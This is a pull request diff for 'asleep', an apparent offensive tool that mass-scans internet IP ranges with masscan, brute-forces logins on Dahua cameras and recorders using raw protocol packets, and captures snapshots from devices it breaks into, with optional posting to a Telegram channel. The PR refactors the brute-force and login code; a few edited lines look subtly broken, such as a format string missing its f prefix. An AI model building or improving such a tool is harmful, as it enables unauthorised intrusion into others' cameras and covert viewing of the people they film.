### PR TITLE
Remove code duplication, refactor brute

### DIFF
--- a/asleep.py
+++ b/asleep.py
@@ -35,7 +35,7 @@ def process_cameras():
     brute_file = config.tmp_masscan_file
     hosts = masscan_parse(brute_file)
     ip_count = len(hosts)
-    logging.info("Parsed %s IPs from Masscan output" % ip_count)
+    logging.info(f"Parsed {ip_count} IPs from Masscan output")
 
     if not hosts:
         return False
@@ -45,7 +45,7 @@ def process_cameras():
     with open(full_ips_list, 'w') as file:
         for host in hosts:
             file.write(host[0] + ":" + host[1] + "\n")
-    logging.info('IPs saved to %s' % full_ips_list)
+    logging.info(f'IPs saved to {full_ips_list}')
 
 
 
@@ -90,15 +90,15 @@ def process_cameras():
 
 
 
-    logging.info('Results: %s devices found, %s bruted' % (len(hosts), len(config.working_hosts)))
-    logging.info('Made total %s snapshots' % (config.snapshots_counts))
+    logging.info(f'Results: {len(hosts)} devices found, {len(config.working_hosts)} bruted')
+    logging.info(f'Made total {config.snapshots_counts} snapshots')
 
 
 def masscan(filescan, threads, resume):
-    logging.info('Starting scan with masscan on ports %s' % ", ".join(config.global_ports))
+    logging.info(f'Starting scan with masscan on ports {", ".join(config.global_ports)}')
     if resume:
         logging.info('Continue last scan from paused.conf')
-        params = ' --resume paused.conf %s' % config.additional_masscan_params()
+        params = ' --resume paused.conf {config.additional_masscan_params()}'
     else:
         params = ' -p %s -iL %s -oL %s --rate=%s %s' % (
             ",".join(config.global_ports), filescan, config.tmp_masscan_file, threads, config.additional_masscan_params())
@@ -260,7 +260,7 @@ def main():
         logging.getLogger().setLevel(logging.DEBUG)
     else:
         logging.getLogger().propagate = False
-    setup_credentials(not options.logins_passes)
+    setup_credentials(options.logins_passes)
     prepare_folders_and_files()
     if not options.brute_only:
         masscan(options.scan_file, options.threads, options.masscan_resume)

--- a/asleep.py
+++ b/asleep.py
@@ -1,23 +1,27 @@
 #!/usr/bin/env python3
 # -*- coding:utf-8 -*-
-
-import sys, random, requests
-import optparse, platform
+import optparse
+import os
+import platform
+import random
+import requests
 import subprocess
+import sys
 import time
-
-from countrycode import countrycode
-from pyfiglet import Figlet
 from pathlib import Path
 from queue import Queue
 
-from geolocation import IPDenyGeolocationToIP
-from bot import Poster
-from snapshot import *
-from export import *
-from utils import *
-from brute import *
 from colorama import init
+from countrycode import countrycode
+from pyfiglet import Figlet
+
+import config
+import export
+import utils
+from bot import Poster
+from brute import BruteThread
+from geolocation import IPDenyGeolocationToIP
+from snapshot import ScreenshotThread, ImageProcessingThread
 
 
 def get_os_type():
@@ -33,21 +37,19 @@ def get_os_type():
 
 def process_cameras():
     brute_file = config.tmp_masscan_file
-    hosts = masscan_parse(brute_file)
+    hosts = utils.masscan_parse(brute_file)
     ip_count = len(hosts)
-    logging.info(f"Parsed {ip_count} IPs from Masscan output")
+    config.logging.info(f"Parsed {ip_count} IPs from Masscan output")
 
     if not hosts:
         return False
 
     ips_list_file = config.ips_file % config.start_datetime
-    full_ips_list = os.path.join(config.reports_folder, ips_list_file)
+    full_ips_list = Path(config.reports_folder) / ips_list_file
     with open(full_ips_list, 'w') as file:
         for host in hosts:
             file.write(host[0] + ":" + host[1] + "\n")
-    logging.info(f'IPs saved to {full_ips_list}')
-
-
+    config.logging.info(f'IPs saved to {full_ips_list}')
 
     config.total = len(hosts)
 
@@ -58,17 +60,17 @@ def process_cameras():
 
         for _ in range(config.default_brute_threads):
             brute_worker = BruteThread(brute_queue, screenshot_queue)
-            brute_worker.setDaemon(True)
+            brute_worker.daemon = True
             brute_worker.start()
 
         for _ in range(config.default_snap_threads):
             screenshot_worker = ScreenshotThread(screenshot_queue, image_processing_queue)
-            screenshot_worker.setDaemon(True)
+            screenshot_worker.daemon = True
             screenshot_worker.start()
 
         for _ in range(config.default_image_threads):
             image_processing_worker = ImageProcessingThread(image_processing_queue)
-            image_processing_worker.setDaemon(True)
+            image_processing_worker.daemon = True
             image_processing_worker.start()
 
 
@@ -83,21 +85,18 @@ def process_cameras():
         print('\n')
 
     except Exception as e:
-        logging.error(e)
-        logging.info("Brute process interrupt!")
-        logging.debug(config.working_hosts)
+        config.logging.error(e)
+        config.logging.info("Brute process interrupt!")
+        config.logging.debug(config.working_hosts)
 
-
-
-
-    logging.info(f'Results: {len(hosts)} devices found, {len(config.working_hosts)} bruted')
-    logging.info(f'Made total {config.snapshots_counts} snapshots')
+    config.logging.info(f'Results: {len(hosts)} devices found, {len(config.working_hosts)} bruted')
+    config.logging.info(f'Made total {config.snapshots_counts} snapshots')
 
 
 def masscan(filescan, threads, resume):
-    logging.info(f'Starting scan with masscan on ports {", ".join(config.global_ports)}')
+    config.logging.info(f'Starting scan with masscan on ports {", ".join(config.global_ports)}')
     if resume:
-        logging.info('Continue last scan from paused.conf')
+        config.logging.info('Continue last scan from paused.conf')
         params = ' --resume paused.conf {config.additional_masscan_params()}'
     else:
         params = ' -p %s -iL %s -oL %s --rate=%s %s' % (
@@ -107,28 +106,25 @@ def masscan(filescan, threads, resume):
     binary = 'sudo ' + mmasscan_path if get_os_type() == 'nix' else mmasscan_path
 
     try:
-        if sys.platform.startswith('freebsd') \
-                or sys.platform.startswith('linux') \
-                or sys.platform.startswith('darwin'):
-           p = subprocess.Popen(
+        if platform.system() == 'Windows':
+            subprocess.Popen(
+                [mmasscan_path, '-V'],
+                bufsize=10000,
+                stdout=subprocess.PIPE)
+        else:
+            subprocess.Popen(
                 [mmasscan_path, '-V'],
                 bufsize=10000,
                 stdout=subprocess.PIPE,
                 close_fds=True)
-        else:
-             p = subprocess.Popen(
-                  [mmasscan_path, '-V'],
-                  bufsize=10000,
-                  stdout=subprocess.PIPE)
-
     except OSError:
-           logging.error('Please install Masscan or define \
-full path to binary in .config file.')
-           sys.exit(0)
+        config.logging.error(
+            'Please install Masscan or define full path to binary in .config file.')
+        sys.exit(0)
 
     os.system(binary + params)
-    if not os.path.exists(config.tmp_masscan_file):
-        logging.error('Masscan output error, results file %s not found. Try to run Masscan as Administrator (root)' %
+    if not Path(config.tmp_masscan_file).exists():
+        config.logging.error('Masscan output error, results file %s not found. Try to run Masscan as Administrator (root)' %
                       config.tmp_masscan_file)
         sys.exit(0)
 
@@ -189,7 +185,7 @@ flag while setting custom ports!')
             try:
                 range_list = locator.get_random_ranges(max_ips=int(count), day_ranges=True)
             except Exception as e:
-                logging.debug(e)
+                config.logging.debug(e)
                 continue
             total_range += range_list
             slash = ['|', '/', ' ', '-']
@@ -200,7 +196,7 @@ flag while setting custom ports!')
                 total_count += count2
             config.max_ips = total_count
         else:
-             logging.info('Generated %s IPs from %s' % (total_count, list(dict.fromkeys(config.random_countries))))
+             config.logging.info('Generated %s IPs from %s' % (total_count, list(dict.fromkeys(config.random_countries))))
              config.global_country = random.choice(config.random_countries)
              file = open(config.tmp_masscan_file, 'w')
              file.write("\n".join(total_range))
@@ -223,7 +219,7 @@ flag while setting custom ports!')
             count3 = IPDenyGeolocationToIP.get_cidr_count(cidr)
             total_count += count3
 
-        logging.info('Generated %s IPs from %s' % (total_count, config.global_country))
+        config.logging.info('Generated %s IPs from %s' % (total_count, config.global_country))
 
         file = open(config.tmp_masscan_file, 'w')
         file.write("\n".join(range_list))
@@ -237,13 +233,13 @@ flag while setting custom ports!')
         config.custom_brute_file = True
         config.tmp_masscan_file = options.brute_file
 
-    if not os.path.exists(options.brute_file) and options.brute_only:
-        logging.error('File with IPs %s not found. Specify it with -b option or run without brute-only option'
+    if not Path(options.brute_file).exists() and options.brute_only:
+        config.logging.error('File with IPs %s not found. Specify it with -b option or run without brute-only option'
                       % config.tmp_masscan_file)
         sys.exit(0)
 
     if not options.scan_file and not options.brute_only and not options.masscan_resume:
-        logging.error("No target file scan list")
+        config.logging.error("No target file scan list")
         parser.print_help()
         sys.exit(0)
 
@@ -257,38 +253,38 @@ def main():
     print('https://t.me/asleep_cg' + '\n')
     options = get_options()
     if options.debug or options.ports:
-        logging.getLogger().setLevel(logging.DEBUG)
+        config.logging.getLogger().setLevel(config.logging.DEBUG)
     else:
-        logging.getLogger().propagate = False
-    setup_credentials(options.logins_passes)
-    prepare_folders_and_files()
+        config.logging.getLogger().propagate = False
+    utils.setup_credentials(options.logins_passes)
+    utils.prepare_folders_and_files()
     if not options.brute_only:
         masscan(options.scan_file, options.threads, options.masscan_resume)
     process_cameras()
     if not options.no_xml and len(config.working_hosts) > 0:
-        save_xml(config.working_hosts)
-    save_csv()
+        export.save_xml(config.working_hosts)
+    export.save_csv()
     if options.dead_cams:
-        hosts = masscan_parse(config.tmp_masscan_file)
-        dead_cams(hosts)
+        hosts = utils.masscan_parse(config.tmp_masscan_file)
+        export.dead_cams(hosts)
 
     # Configs for Telegram Bot:
     ROOM_ID = '' # Channel ID
     TOKEN = '' # Bot Token
-    SNAPSHOT_DIR = os.path.join(Path.cwd(), config.snapshots_folder)
+    SNAPSHOT_DIR = Path.cwd() / config.snapshots_folder
     """ delete=True removes snapshots after posting """
     #poster = Poster(SNAPSHOT_DIR, TOKEN, ROOM_ID, delete=False) 
     #poster.start()  ### Start posting function
 
-    if os.path.exists(config.snapshots_folder):
+    if Path(config.snapshots_folder).exists():
         c_error = False
         if config.global_country:
-           try:
-               os.rename(config.snapshots_folder, '%s_%s' % (config.global_country, config.start_datetime))
-           except:
-               c_error = True
+            try:
+                Path(config.snapshots_folder).rename(f'{config.global_country}_{config.start_datetime}')
+            except:
+                c_error = True
         elif not config.global_country or c_error:
-             os.rename(config.snapshots_folder, 'Snapshots_%s' % config.start_datetime)
+            Path(config.snapshots_folder).rename(f'Snapshots_{config.start_datetime}')
 
 
 if __name__ == '__main__':
@@ -296,5 +292,5 @@ if __name__ == '__main__':
         main()
     except KeyboardInterrupt:
         print('\n')
-        logging.info('Interrupted by user')
+        config.logging.info('Interrupted by user')
         sys.exit(0)

--- a/asleep.py
+++ b/asleep.py
@@ -43,6 +43,10 @@ def process_cameras():
 
     if not hosts:
         return False
+    if ip_count < config.default_brute_threads:
+        config.default_brute_threads = ip_count
+        config.default_snap_threads = max(1, ip_count - 20)
+        config.default_image_threads = max(1, ip_count - 100)
 
     ips_list_file = config.ips_file % config.start_datetime
     full_ips_list = Path(config.reports_folder) / ips_list_file
@@ -249,8 +253,8 @@ flag while setting custom ports!')
 def main():
     get_os_type()
     f = Figlet(font='slant')
-    print(f.renderText('asleep')) #+ '\n')
-    print('https://t.me/asleep_cg' + '\n')
+    print(f.renderText('asleep'))
+    print('https://t.me/asleep_cg\n')
     options = get_options()
     if options.debug or options.ports:
         config.logging.getLogger().setLevel(config.logging.DEBUG)

--- a/brute.py
+++ b/brute.py
@@ -21,16 +21,16 @@ class BruteThread(threading.Thread):
     def dahua_login(self, server_ip, port, login, password):
         with threading.Lock():
             config.update_status()
-            logging.debug('Login attempt: {server_ip} with {login}:{password}')
+            logging.debug(f'Login attempt: {server_ip} with {login}:{password}')
         dahua = DahuaController(server_ip, port, login, password)
         if dahua.status == 0:
             logging.debug(f'Success login: {server_ip} with {login}:{password}')
             return dahua
         elif dahua.status == 2:
-            logging.debug('Blocked camera: {server_ip}:{port}')
+            logging.debug(f'Blocked camera: {server_ip}:{port}')
             return "Blocked"
         else:
-            logging.debug('Unable to login: {server_ip}:{port} with {login}:{password}')
+            logging.debug(f'Unable to login: {server_ip}:{port} with {login}:{password}')
             return None
 
     def dahua_auth(self, host):

--- a/config.py
+++ b/config.py
@@ -4,7 +4,6 @@ import time
 
 logins = []
 passwords = []
-logopasses = []
 top_logopass = {}
 working_hosts = []
 random_countries = []

--- a/dahua.py
+++ b/dahua.py
@@ -6,6 +6,7 @@ import socket
 import struct
 import time
 import logging
+from enum import Enum
 #import telegram
 
 #from wrapt_timeout_decorator import *
@@ -25,41 +26,48 @@ GET_SNAPSHOT = b'\x11\x00\x00\x00(\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x
 JPEG_GARBAGE1 = b'\x0a%b\x00\x00\x0a\x00\x00\x00'
 JPEG_GARBAGE2 = b'\xbc\x00\x00\x00\x00\x80\x00\x00%b'
 
-#Ускорение / Perfomance
+# Ускорение / Perfomance
 TIMEOUT = 11
 
 logging.basicConfig(level=logging.INFO, format='[%(asctime)s] [%(levelname)s] %(message)s')
 
+class Status(Enum):
+    SUCCESS = 0
+    BLOCKED = 2
+    NONE = -1
+
 class DahuaController:
-    def __init__(self, ip, port, login, password):
+    def __init__(self, ip=None, port=None):
         self.model = ''
-#        self.serial = ''
         self.ip = ip
         self.port = port
-        self.login = login
-        self.password = password
+        self.login = None
+        self.password = None
         self.channels_count = -1
-        self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-        self.socket.settimeout(TIMEOUT)
-        self.socket.connect((ip, port))
-        self.socket.send(LOGIN_TEMPLATE % (struct.pack('b', 24 + len(login) + len(password)), login.encode('ascii'),
+        self.status = Status.NONE
+
+        self._socket = None
+        
+
+    def auth(self, login, password):
+        self._socket = socket.create_connection((self.ip, self.port), TIMEOUT)
+        self._socket.send(LOGIN_TEMPLATE % (struct.pack('b', 24 + len(login) + len(password)), login.encode('ascii'),
                                            (8 - len(login)) * b'\x00', password.encode('ascii'),
                                            (8 - len(password)) * b'\x00', login.encode('ascii'),
                                            password.encode('ascii'), str(int(time.time())).encode('ascii')))
-        data = self.socket.recv(128)
+        data = self._socket.recv(128)
         if len(data) >= 10:
-            if data[8] == 1:
-                if data[9] == 4:
-                    self.status = 2
-                self.status = 1
+            if data[8] == 1 and data[9] == 4:
+                self.status = Status.BLOCKED
             elif data[8] == 0:
-                self.status = 0
+                self.login = login
+                self.password = password
+                self.status = Status.SUCCESS
             else:
-                self.status = -1
-        else:
-            self.status = -1
-        if self.status == 0:
-            self.socket.send(GET_PTZ)
+                self.status = Status.NONE
+
+        if self.status is Status.SUCCESS:
+            self._socket.send(GET_PTZ)
             self.model = self.receive_msg().split(b'\x00')[0].decode('ascii')
 
             self.get_sound_info()
@@ -67,7 +75,7 @@ class DahuaController:
             self.get_channels_count()
 
     def get_sound_info(self):
-        self.socket.send(GET_SOUND)
+        self._socket.send(GET_SOUND)
         get_soundInfo = self.receive_msg()
         self.sound = get_soundInfo.split(b'\x00')[0].decode('ascii')
 #        bot = telegram.Bot(token="", request=telegram.utils.request.Request(connect_timeout=20, read_timeout=20))
@@ -80,7 +88,7 @@ class DahuaController:
         ptz_data = {
 'DH-SD42212T-HN', 'CCTV-Camera-DH-SD50230U-HN', 'CCTV-Camera-DH-SD59220T-HN', 'DH-SD59220T-HN', 'CP-UNC-CS10L1W', 'DHI-HCVR4104C-S3', 'DHI-HCVR4104HS-S2', 'DHI-HCVR4108HS-S2', 'DHI-iDVR5116H-F', 'DHI-NVR4104H', 'DHI-NVR4104HS-P-4KS2', 'DHI-NVR4104-P', 'DHI-NVR4104_P', 'DHI-NVR4104-P-4KS2', 'DHI-NVR4104_W', 'DH-IPC-A35N', 'DH-IPC-A46P', 'DH-IPC-AW12W', 'DH-IPC-AW12WN', 'DH-IPC-AW12WP', 'DH-IPC-K15', 'DH-IPC-K15P', 'DH-IPC-KW12WP', 'DH-SD22204T-GN', 'DH-SD22204T-GN-W', 'DH-SD22204TN-GN', 'DH-SD29204T-GN-W', 'DH-SD-32D203S-HN', 'DH-SD42212T-HN', 'DH-SD42212TN-HN', 'DH-SD50120S-HN', 'DH-SD50220T-HN', 'DH-SD59120T-HN', 'DH-SD59120TN-HN', 'DH-SD59131UN-HNI', 'DH-SD59220SN-HN', 'DH-SD59220T-HN', 'DH-SD59220TN-HN', 'DH-SD59225U-HNI', 'DH-SD59230S-HN', 'DH-SD59230T-HN', 'DH-SD59230U-HNI', 'DH-SD59430U-HN', 'DH-SD59430U-HNI', 'DH-SD6582A-HN', 'DH-SD6C120T-HN', 'DH-SD-6C1220S-HN', 'DH-SD6C220S-HN', 'DH-SD6C220T-HN', 'DH-SD6C230S-HN', 'DVR-HF-A', 'IP2M-841B', 'IP2M-841B-UK', 'IP2M-841W-UK', 'IPC-A15', 'IPC-A35', 'IPC-A7', 'IP Camera', 'IPC-AW12W', 'IPC-HDBW1000E-W', 'IP', 'PTZ', 'IPC', 'IPC-HDBW1320E-W', 'IPC-HDPW4200F-WPT', 'IPC-HDPW4221F-W', 'IPC-HFW1000S-W', 'IPC-HFW1320S-W', 'IPC-HFW1435S-W', 'IPC-HFW2325S-W', 'IPC-HFW4431E-S', 'IPC-HFW5200E-Z12', 'IPC-K100W', 'IPC-K15', 'IPC-K200W', 'IPC-KW100W', 'IPC-KW10W', 'IPC-KW12W', 'IPD-IZ22204T-GN', 'IPM-721S', 'IP PTZ Dome', 'PTZ Dome', 'IPPTZ-EL2L12X-MINI-I', 'LTV-ISDNI3-SDM2', 'MDVR_MEUED', 'RVi-IPC11W', 'SD59120T-HN', 'SD59220TN-HN', 'SD6982A-HN', 'SDQCN8029Z', 'ST-712-IP-PRO-D', 'VTO2111D', 'XS-IPCV026-3W'}
         test_sound = re.findall('Dahua.Device.Record.General', self.sound)
-#        self.socket.send(GET_PTZ)
+#        self._socket.send(GET_PTZ)
 #        get_ptzInfo = self.receive_msg()
 #        self.model = get_ptzInfo.split(b'\x00')[0].decode('ascii')
         if self.model in ptz_data:
@@ -95,27 +103,27 @@ class DahuaController:
             return self.model
 
     def get_channels_count(self):
-        self.socket.send(GET_CHANNELS)
+        self._socket.send(GET_CHANNELS)
         channels = self.receive_msg()
         self.channels_count = channels.count(b'&&') + 1
         return self.channels_count
 
     def receive_msg(self):
-        header = self.socket.recv(32)
+        header = self._socket.recv(32)
         try:
             length = struct.unpack('<H', header[4:6])[0]
         except struct.error:
             raise struct.error
-        data = self.socket.recv(length)
+        data = self._socket.recv(length)
         return data
 
 #    @timeout(15) # (wrapt_timeout_decorator) TODO: play with timer
     def get_snapshot(self, channel_id):
         channel_id = struct.pack('B', channel_id)
-        self.socket.send(GET_SNAPSHOT % (channel_id, channel_id))
-        self.socket.settimeout(4)
+        self._socket.send(GET_SNAPSHOT % (channel_id, channel_id))
+        self._socket.settimeout(4)
         data = self.receive_msg_2(channel_id)
-        self.socket.settimeout(TIMEOUT)
+        self._socket.settimeout(TIMEOUT)
         return data
 
     def receive_msg_2(self, c_id):
@@ -124,7 +132,7 @@ class DahuaController:
         data = b''
         i = 0
         while True: # i != 30
-            buf = self.socket.recv(1460)
+            buf = self._socket.recv(1460)
             if i == 0:
                 buf = buf[32:]
             data += buf

--- a/utils.py
+++ b/utils.py
@@ -52,7 +52,7 @@ def prepare_folders_and_files():
 
 def setup_credentials(use_custom_credentials):
     if use_custom_credentials:
-        if not Path(config.logins_file).exists:
+        if not Path(config.logins_file).exists():
             logging.error(f'Logins file {config.logins_file} not found!')
             sys.exit(0)
         if not Path(config.passwords_file).exists():


### PR DESCRIPTION
`logopasses` list in `config.py` was unnecessary, because we can just use `logins` and `passwords`. So now `setup_credentials` in `utils.py` will add credentials only to `config.logins` and `config.passwords` in either way. That allows us to remove code duplication in `brute.py`.

Performance should be improved, because now it won't create `DahuaController` during brute on each pass. Also, when error caught during bruting it now will stop it by `return`.